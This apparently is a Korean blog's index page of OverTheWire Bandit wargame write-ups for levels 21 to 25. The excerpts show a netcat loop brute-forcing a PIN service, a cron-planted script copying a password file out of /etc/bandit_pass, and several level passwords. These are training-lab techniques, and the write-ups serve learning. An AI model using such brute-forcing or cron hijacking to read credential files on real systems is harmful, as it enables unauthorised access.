CTF Write-UP/overthewire.org (완료)33 Bandit Level 24 → Level 25 bandit 24 문제 bandit 24 풀이 쉘 스크립트를 이용하여 풀이를 해준다. bandit24@bandit:/tmp/cpucode$ vi cpu.sh #!/bin/bash for i in {1..9999} do echo "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i" done | nc localhost 30002 파일을 실행하면 반복문이 돌아가고 다음단계로 가는 패스워드가 나온다. ./cpu.sh I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space. Wrong! P.. 2021. 12. 13. Bandit Level 23 → Level 24 bandit 23 문제 bandit 23 풀이 패스워드를 얻기 위해서는 쉘코드를 만들어서 해결해야 한다고 하는데 cpu를 폴더를 만들어서 쉘코드를 제작한뒤 권한을 설정해주고 sh파일을 /spool 폴더로 복사해주면 다음 레벨의 패스워드 파일인 bandit_pass가 나온다. bandit23@bandit:/etc/cron.d$ mkdir -p /tmp/cpu bandit23@bandit:/etc/cron.d$ cd /tmp/cpu bandit23@bandit:/tmp/cpu$ vi cpu.sh -> cat /etc/bandit_pass/bandit24 > /tmp/dubini2/bandit_pass 작성 bandit23@bandit:/tmp/cpu$ chmod 777 cpu.sh bandit23@bandi.. 2021. 11. 9. Bandit Level 22 → Level 23 Bandit 22 문제 Bandit 22 풀이 /etc/cron.d로 이동해준뒤 다음암호가 있는 cronjob_bandit23을 열어 /usr/bin/cronjob_bandit23.sh을 실행해준다. 실행해주게되면 bandit23 암호가 echo I am user $myname | md5sum | cut -d ' ' -f 1 을 실행해 복사해 주게 되면 tmp파일에 암호가 저장되어 있다는 것을 알수있게 된다. 따라서 $myname 값을 bandit23으로 설정해준뒤 echo I am user bandit23 | md5sum | cut -d ' ' -f 1 을 입력해주면 8ca319486bfbbc3663ea0fbe81326349 값이 나오게 되고 cat /tmp/8ca319486bfbbc3663ea0fbe.. 2021. 11. 3. Bandit Level 21 → Level 22 Bandit 21 문제 Bandit 21 풀이 패스워드는 /ete/cron.d/ 에 잠금되어 있다고 한다. /ete/cron.d/ 로 이동해준뒤 cronjob_bandit22 파일을 열게되면 /usr/bin/cronjob_bandit22.sh 에서 실행이 되는것으로 보이며 /usr/bin/cronjob_bandit22.sh을 실행해주면 bandit22 암호가 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv에 위치해 있는것을 확인할수 있다. 더보기 Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI 2021. 11. 2. 이전 1 2 3 4 5 6 ··· 9 다음
